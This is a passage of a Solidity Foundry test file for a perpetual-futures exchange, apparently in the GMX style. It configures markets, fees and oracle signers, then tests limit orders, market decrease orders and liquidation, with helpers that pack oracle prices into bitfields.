_marketFactory.createMarket(address(0), address(_tokenC), address(_wnt), keccak256(abi.encode(\"swap-tokenC-wnt\"))); \\n \\n \\n _dataStore.setUint(Keys.minCollateralFactorForOpenInterestMultiplierKey(_marketProps1.marketToken, true), 1e25);\\n _dataStore.setUint(Keys.minCollateralFactorForOpenInterestMultiplierKey(_marketProps1.marketToken, false), 1e25);\\n \\n // see fees for the market\\n _dataStore.setUint(Keys.swapFeeFactorKey(_marketProps1.marketToken), 0.05e30); // 5%\\n _dataStore.setUint(Keys.SWAP_FEE_RECEIVER_FACTOR, 
0.5e30);\\n _dataStore.setUint(Keys.positionFeeFactorKey(_marketProps1.marketToken), 0.00001234e30); // 2%\\n _dataStore.setUint(Keys.POSITION_FEE_RECEIVER_FACTOR, 0.15e30);\\n _dataStore.setUint(Keys.MAX_UI_FEE_FACTOR, 0.01e30);\\n _dataStore.setUint(Keys.uiFeeFactorKey(uiFeeReceiver), 0.01e30); // only when this is set, one can receive ui fee, so stealing is not easy\\n _dataStore.setInt(Keys.poolAmountAdjustmentKey(_marketProps1.marketToken, _marketProps1.longToken), 1);\\n _dataStore.setInt(Keys.poolAmountAdjustmentKey(_marketProps1.marketToken, _marketProps1.shortToken), 1);\\n _dataStore.setUint(Keys.swapImpactExponentFactorKey(_marketProps1.marketToken), 10e28);\\n _dataStore.setUint(Keys.swapImpactFactorKey(_marketProps1.marketToken, true), 0.99e30);\\n _dataStore.setUint(Keys.swapImpactFactorKey(_marketProps1.marketToken, false), 0.99e30);\\n\\n \\n \\n \\n // set gas limit to transfer a token\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_sol)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_wnt)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_usdc)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenA)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenB)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_tokenC)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketProps1.marketToken)), 32000); \\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsAB.marketToken)), 32000);\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsBC.marketToken)), 32000);\\n _dataStore.setUint(Keys.tokenTransferGasLimit(address(_marketPropsCwnt.marketToken)), 32000);\\n\\n\\n /* Configure the system parameters/limits here */\\n _dataStore.setUint(Keys.MAX_CALLBACK_GAS_LIMIT, 10000);\\n _dataStore.setUint(Keys.EXECUTION_GAS_FEE_BASE_AMOUNT, 100);\\n _dataStore.setUint(Keys.MAX_ORACLE_PRICE_AGE, 2 hours);\\n 
_dataStore.setUint(Keys.MIN_ORACLE_BLOCK_CONFIRMATIONS, 3);\\n _dataStore.setUint(Keys.MIN_COLLATERAL_USD, 1e30); // just require $1 as min collateral usd\\n _dataStore.setUint(Keys.reserveFactorKey(_marketProps1.marketToken, true), 5e29); // 50%\\n _dataStore.setUint(Keys.reserveFactorKey(_marketProps1.marketToken, false), 5e29);\\n _dataStore.setUint(Keys.fundingExponentFactorKey(_marketProps1.marketToken), 1.1e30); // 2 in 30 decimals like a square, cube, etc\\n _dataStore.setUint(Keys.fundingFactorKey(_marketProps1.marketToken), 0.0000001e30);\\n _dataStore.setUint(Keys.borrowingFactorKey(_marketProps1.marketToken, true), 0.87e30);\\n _dataStore.setUint(Keys.borrowingFactorKey(_marketProps1.marketToken, false), 0.96e30);\\n _dataStore.setUint(Keys.borrowingExponentFactorKey(_marketProps1.marketToken, true), 2.1e30);\\n _dataStore.setUint(Keys.borrowingExponentFactorKey(_marketProps1.marketToken, false), 2.3e30);\\n _dataStore.setUint(Keys.positionImpactExponentFactorKey(_marketProps1.marketToken), 2e30);\\n _dataStore.setUint(Keys.positionImpactFactorKey(_marketProps1.marketToken, true), 5e22); \\n _dataStore.setUint(Keys.positionImpactFactorKey(_marketProps1.marketToken, false), 1e23);\\n\\n // set the limit of market tokens\\n\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketProps1.marketToken, _marketProps1.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketProps1.marketToken, _marketProps1.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsAB.marketToken, _marketPropsAB.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsAB.marketToken, _marketPropsAB.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsBC.marketToken, _marketPropsBC.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsBC.marketToken, _marketPropsBC.shortToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsCwnt.marketToken, 
_marketPropsCwnt.longToken), 1000e18);\\n _dataStore.setUint(Keys.maxPoolAmountKey(_marketPropsCwnt.marketToken, _marketPropsCwnt.shortToken), 1000e18);\\n \\n \\n // set max open interest for each market\\n _dataStore.setUint(Keys.maxOpenInterestKey(_marketProps1.marketToken, true), 1e39); // 1B $ \\n _dataStore.setUint(Keys.maxOpenInterestKey(_marketProps1.marketToken, false), 1e39); // 1B $\\n\\n _dataStore.setUint(Keys.maxPnlFactorKey(Keys.MAX_PNL_FACTOR_FOR_WITHDRAWALS, _marketProps1.marketToken, true), 10**29); // maxPnlFactor = 10% for long\\n _dataStore.setUint(Keys.maxPnlFactorKey(Keys.MAX_PNL_FACTOR_FOR_WITHDRAWALS, _marketProps1.marketToken, false), 10**29); // maxPnlFactor = 10% for short\\n // _dataStore.setBool(Keys.cancelDepositFeatureDisabledKey(address(_depositHandler)), true);\\n _dataStore.setBool(Keys.cancelOrderFeatureDisabledKey(address(_orderHandler), uint256(Order.OrderType.MarketIncrease)), true);\\n\\n addFourSigners();\\n address(_wnt).call{value: 10000e18}(\"\");\\n depositor1 = address(0x801);\\n depositor2 = address(0x802);\\n depositor3 = address(0x803);\\n\\n // make sure each depositor has some tokens.\\n _wnt.transfer(depositor1, 1000e18);\\n _wnt.transfer(depositor2, 1000e18);\\n _wnt.transfer(depositor3, 1000e18); \\n _usdc.transfer(depositor1, 1000e18);\\n _usdc.transfer(depositor2, 1000e18);\\n _usdc.transfer(depositor3, 1000e18);\\n _tokenA.transfer(depositor1, 1000e18);\\n _tokenB.transfer(depositor1, 1000e18);\\n _tokenC.transfer(depositor1, 1000e18); \\n\\n printAllTokens(); \\n }\\n\\n error Unauthorized(string);\\n // error Error(string);\\n\\n\\nfunction testLimit() public{\\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = 
IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(\"Experiment 1 is completed.\"); \\n \\n // console2.log(\"PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP\");\\n \\n key = createMarketSwapOrder(depositor1, address(_wnt), 1e15); // create a deposit at block 3 which is within range (2, 6) \\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(\"Experiment 2 is completed.\"); \\n \\n\\n console2.log(\"\\n\\n depositor 1 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 20e18, 1001e30, 106000000000000, true); // \\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(\"Experiment 3 is completed.\"); \\n \\n \\n\\n console2.log(\"\\n\\n depositor 2 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 110e18, 13e30, 101000000000000, false); // 110 usdc as collateral\\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(\"Experiment 4 is completed.\"); \\n \\n\\n\\n console2.log(\"PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP\");\\n vm.warp(2 days);\\n setIndexTokenPrice(priceParams, 98, 100); // send 20e18 USDC, increase $13.123 in a long position with trigger price 101\\n key = createLimitIncreaseOrder(depositor3, _marketProps1.marketToken, 
_marketProps1.shortToken, 23e18, 1.1234567e30, 101000000000000, true); // collateral token, usdsize, price\\n console2.log(\"a LimitIncrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"Experiment 5 is completed.\\n\"); \\n \\n\\n // depositor3 creates a LimitDecrease order\\n /*\\n setIndexTokenPrice(priceParams, 120, 125);\\n key = createLimitDecreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 120000000000000, 120000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(\"a LimitIncrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(\"Experiment 7 for is completed.\"); \\n */\\n}\\n\\nfunction testMarketDecrease() public{\\n \\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n 
mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(\"Experiment 1 is completed.\"); \\n \\n \\n \\n \\n console2.log(\"\\n\\n depositor 2 deposit into marketProps1\");\\n key = createDepositNoSwap(_marketProps1, depositor2, 100e18, true);\\n _depositHandler.executeDeposit(key, priceParams);\\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor2);\\n printPoolsAmounts();\\n console2.log(\"Experiment 2 is completed.\"); \\n \\n \\n console2.log(\"\\n\\n depositor 1 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 20e18, 1e25, 106000000000000, true); // \\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(\"Experiment 3 is completed.\"); \\n \\n \\n\\n console2.log(\"\\n\\n depositor 2 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 110e18, 1e25, 101000000000000, false); // 110 usdc as collateral\\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(\"Experiment 4 is completed.\"); \\n \\n console2.log(\"********************************************\");\\n\\n // deposit 2 will execute a marketDecreaseOrder now\\n key = createMarketDecreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.longToken, 70000000000000, 5e23, false) ; // decrease by 5%\\n console2.log(\"a market desced order created with key: \");\\n console2.logBytes32(key);\\n console2.log(\"\\nExecuting the order// rest of code\"); \\n setIndexTokenPrice(priceParams, 60, 65); // we have a profit for a short 
position\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.longToken, false);\\n console2.log(\"Experiment 5 is completed.\"); \\n\\n printAllTokens();\\n} \\n\\n \\n\\nfunction testLiquidation() public{\\n // blockrange (2, 6)\\n OracleUtils.SetPricesParams memory priceParams = createSetPricesParams();\\n \\n vm.roll(block.number+2); // block 3\\n\\n \\n bytes32 key = createDepositNoSwap(_marketProps1, depositor1, 90e18, true); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n uint mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n key = createDepositNoSwap(_marketProps1, depositor1, 100e18, false); // create a deposit at block 3 which is within range (2, 6) \\n _depositHandler.executeDeposit(key, priceParams); \\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor1);\\n console2.log(\"Experiment 1 is completed.\"); \\n \\n \\n \\n \\n console2.log(\"\\n\\n depositor 2 deposit into marketProps1\");\\n key = createDepositNoSwap(_marketProps1, depositor2, 100e18, true);\\n _depositHandler.executeDeposit(key, priceParams);\\n mintedMarketTokens = IERC20(_marketProps1.marketToken).balanceOf(depositor2);\\n printPoolsAmounts();\\n console2.log(\"Experiment 2 is completed.\"); \\n \\n \\n console2.log(\"\\n\\n depositor 1 createMarketIncreaseOrder\");\\n key = createMarketIncreaseOrder(depositor1, _marketProps1.marketToken, _marketProps1.longToken, 10e18, 1e25, 106000000000000, true);\\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor1, _marketProps1.marketToken, _marketProps1.longToken, true);\\n console2.log(\"Experiment 3 is completed.\"); \\n \\n \\n\\n console2.log(\"\\n\\n depositor 2 createMarketIncreaseOrder\");\\n key = 
createMarketIncreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.shortToken, 100e18, 1e25, 101000000000000, false);\\n console2.log(\"\\nExecuting the order// rest of code\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.shortToken, false);\\n console2.log(\"Experiment 4 is completed.\"); \\n \\n \\n\\n // deposit 2 will execute a marketDecreaseOrder now\\n key = createMarketDecreaseOrder(depositor2, _marketProps1.marketToken, _marketProps1.shortToken, 106000000000000, 5e23, false) ; // decrease by 5%\\n console2.log(\"a market desced order created with key: \");\\n console2.logBytes32(key);\\n console2.log(\"\\nExecuting the order// rest of code\"); \\n setIndexTokenPrice(priceParams, 84, 90);\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor2, _marketProps1.marketToken, _marketProps1.shortToken, false);\\n console2.log(\"Experiment 5 is completed.\"); \\n \\n \\n\\n \\n // depositor3 will execute a LimitIncrease Order now\\n key = createMarketIncreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 20e18, 200e30, 101000000000000, true); // collateral token, usdsize, price\\n console2.log(\"a LimitIncrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"Experiment 6 is completed.\\n\"); \\n \\n\\n // depositor3 creates a LimitDecrease order\\n setIndexTokenPrice(priceParams, 120, 125);\\n key = createLimitDecreaseOrder(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 
120000000000000, 120000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(\"a LimitIncrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams); \\n console2.log(\"Experiment 7 for is completed.\"); \\n \\n // depositor3 creates a stopLossDecrease order\\n setIndexTokenPrice(priceParams, 97, 99);\\n key = createStopLossDecrease(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, 7e18, 58e30, 95000000000000, 92000000000000, true); // retrieve $50? collateral token, usdsize, acceptible price\\n console2.log(\"a StopLossDecrease order created by depositor3 with key: \");\\n console2.logBytes32(key);\\n // Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n\\n console2.log(\"\\n\\nExecuting the order, exiting moment// rest of code\\n\\n\");\\n _orderHandler.executeOrder(key, priceParams);\\n console2.log(\"Experiment 8 is completed.\"); \\n \\n \\n console2.log(\"\\n\\n*************************************************\\n\\n\");\\n\\n\\n // depositor3 creates a Liquidation order\\n setIndexTokenPrice(priceParams, 75, 75);\\n console2.log(\"Liquidate a position// rest of code\");\\n Position.printPosition(_dataStore, depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true);\\n _liquidationHandler.executeLiquidation(depositor3, _marketProps1.marketToken, _marketProps1.shortToken, true, priceParams);\\n console2.log(\"Experiment 9 is completed.\"); \\n \\n\\n // printPoolsAmounts();\\n printAllTokens();\\n\\n \\n \\n \\n}\\n\\nfunction printAllTokens() startedCompleted(\"printAllTokens\") public\\n{\\n console2.log(\"\\nTokens used in this test:\");\\n console2.log(\"_wnt: \"); 
console2.logAddress(address(_wnt));\\n console2.log(\"_usdc: \"); console2.logAddress(address(_usdc));\\n console2.log(\"_sol: \"); console2.logAddress(address(_sol));\\n console2.log(\"_tokenA: \"); console2.logAddress(address(_tokenA));\\n console2.log(\"_tokenB: \"); console2.logAddress(address(_tokenB));\\n console2.log(\"_tokenC: \"); console2.logAddress(address(_tokenC));\\n console2.logString(\"test contract address:\"); console2.logAddress(address(this));\\n \\n console2.log(\"_marketProps1 market token: \"); console2.logAddress(address(_marketProps1.marketToken));\\n console2.log(\"_marketPropsAB market token: \"); console2.logAddress(address(_marketPropsAB.marketToken));\\n console2.log(\"_marketPropsBC market token: \"); console2.logAddress(address(_marketPropsBC.marketToken));\\n console2.log(\"_marketProps1Cwnt market token: \"); console2.logAddress(address(_marketPropsCwnt.marketToken));\\n console2.log(\"\\n\");\\n \\n \\n}\\n\\n\\nfunction printMarketTokenAmount() public \\n{ console2.log(\"Market token address: \");\\n console2.logAddress(address(_marketProps1.marketToken));\\n console2.log(\"depositor1 market token amount: %d\", IERC20(_marketProps1.marketToken).balanceOf(depositor1));\\n console2.log(\"depositor2 market token amount: %d\", IERC20(_marketProps1.marketToken).balanceOf(depositor2));\\n console2.log(\"depositor3 market token amount: %d\", IERC20(_marketProps1.marketToken).balanceOf(depositor3));\\n}\\n\\nfunction printLongShortTokens(address account) public\\n{\\n console2.log(\"balance for \"); console2.logAddress(account);\\n console2.log(\"_wnt balance:\", _wnt.balanceOf(account));\\n console2.log(\"usdc balance:\", _usdc.balanceOf(account));\\n}\\n\\n\\n\\n\\nfunction addFourSigners() private {\\n _oracleStore.addSigner(address(901));\\n _oracleStore.addSigner(address(902)); \\n _oracleStore.addSigner(address(903)); \\n _oracleStore.addSigner(address(904)); \\n}\\n\\n\\nfunction setIndexTokenPrice(OracleUtils.SetPricesParams 
memory priceParams, uint256 minP, uint256 maxP) public\\n{\\n uint256 mask1 = ~uint256(type(uint96).max); // (32*3 of 1's)\\n console2.logBytes32(bytes32(mask1));\\n\\n uint256 minPrice = minP;\\n minPrice = minPrice << 32 | minP;\\n minPrice = minPrice << 32 | minP;\\n\\n uint256 maxPrice = maxP;\\n maxPrice = maxPrice << 32 | maxP;\\n maxPrice = maxPrice << 32 | maxP;\\n\\n priceParams.compactedMinPrices[0] = (priceParams.compactedMinPrices[0] & mask1) | minPrice;\\n priceParams.compactedMaxPrices[0] = (priceParams.compactedMaxPrices[0] & mask1) | maxPrice;\\n}\\n\\n\\nfunction createSetPricesParams() public returns (OracleUtils.SetPricesParams memory) {\\n uint256 signerInfo = 3; // signer 904\\n signerInfo = signerInfo << 16 | 2; // signer 903\\n signerInfo = signerInfo << 16 | 1; // signer 902\\n signerInfo = signerInfo << 16 | 3; // number of singers\\n // will read out as 902, 903, 904 from the lowest first\\n\\n // the number of tokens, 6\\n address[] memory tokens = new address[](6);\\n tokens[0] = address(_sol);\\n tokens[1] = address(_wnt);\\n tokens[2] = address(_usdc);\\n tokens[3] = address(_tokenA);\\n tokens[4] = address(_tokenB);\\n tokens[5] = address(_tokenC);\\n\\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n uint256[] memory compactedMinOracleBlockNumbers = new uint256[](2);\\n compactedMinOracleBlockNumbers[0] = block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n compactedMinOracleBlockNumbers[0] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n\\n compactedMinOracleBlockNumbers[1] = block.number+1;\\n compactedMinOracleBlockNumbers[1] = compactedMinOracleBlockNumbers[0] << 64 | block.number+1;\\n \\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 
64*4 for one element, so need two elements \\n \\n uint256[] memory compactedMaxOracleBlockNumbers = new uint256[](2);\\n compactedMaxOracleBlockNumbers[0] = block.number+5; \\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5;\\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5; \\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5; \\n\\n compactedMaxOracleBlockNumbers[1] = block.number+5; \\n compactedMaxOracleBlockNumbers[1] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5;\\n\\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n uint256[] memory compactedOracleTimestamps = new uint256[](2);\\n compactedOracleTimestamps[0] = 9;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 8;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 7;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 7;\\n \\n compactedOracleTimestamps[1] = 9;\\n compactedOracleTimestamps[1] = compactedOracleTimestamps[0] << 64 | 8;\\n \\n\\n // must be equal to the number of tokens, 8 for each, so 8*6= 48, only need one element\\n uint256[] memory compactedDecimals = new uint256[](1);\\n compactedDecimals[0] = 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 32 bits, so each 8 entries takes one element, we need 3 elements\\n // price table:\\n // SOL: 100 101 102\\n // wnt: 200 201 203\\n // USDC 1 1 1\\n // tokenA 100 101 102\\n // tokenB 200 202 204\\n // tokenC 400 404 408\\n\\n uint256[] memory 
compactedMinPrices = new uint256[](3);\\n compactedMinPrices[2] = 408; \\n compactedMinPrices[2] = compactedMinPrices[2] << 32 | 404;\\n\\n compactedMinPrices[1] = 400;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 204;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 202;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 200;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 102;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 101;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 100;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 1;\\n \\n compactedMinPrices[0] = 1;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 1;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 203;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 201;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 200;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 102;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 101;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 100;\\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 8 bits, so we just need one element\\n\\n uint256[] memory compactedMinPricesIndexes = new uint256[](1);\\n compactedMinPricesIndexes[0] = 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = 
compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 32 bits, so each 8 entries takes one element, we need 3 elements\\n // price table:\\n // SOL: 105 106 107\\n // wnt: 205 206 208\\n // USDC 1 1 1\\n // tokenA 105 106 107\\n // tokenB 205 207 209\\n // tokenC 405 409 413\\n uint256[] memory compactedMaxPrices = new uint256[](3);\\n compactedMaxPrices[2] = 413;\\n compactedMaxPrices[2] = compactedMaxPrices[2] << 32 | 409;\\n \\n compactedMaxPrices[1] = 405;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 209;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 207;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 205;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 107;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 106;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 105;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 1;\\n\\n compactedMaxPrices[0] = 1;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 1;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 208;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 206; \\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 205; \\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 107;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 106;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 105;\\n \\n \\n // three signers, 6 tokens, so we have 3*6 = 
18 entries, each entry takes 8 bits, so we just need one element\\n\\n uint256[] memory compactedMaxPricesIndexes = new uint256[](1);\\n compactedMaxPricesIndexes[0] = 1; \\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] 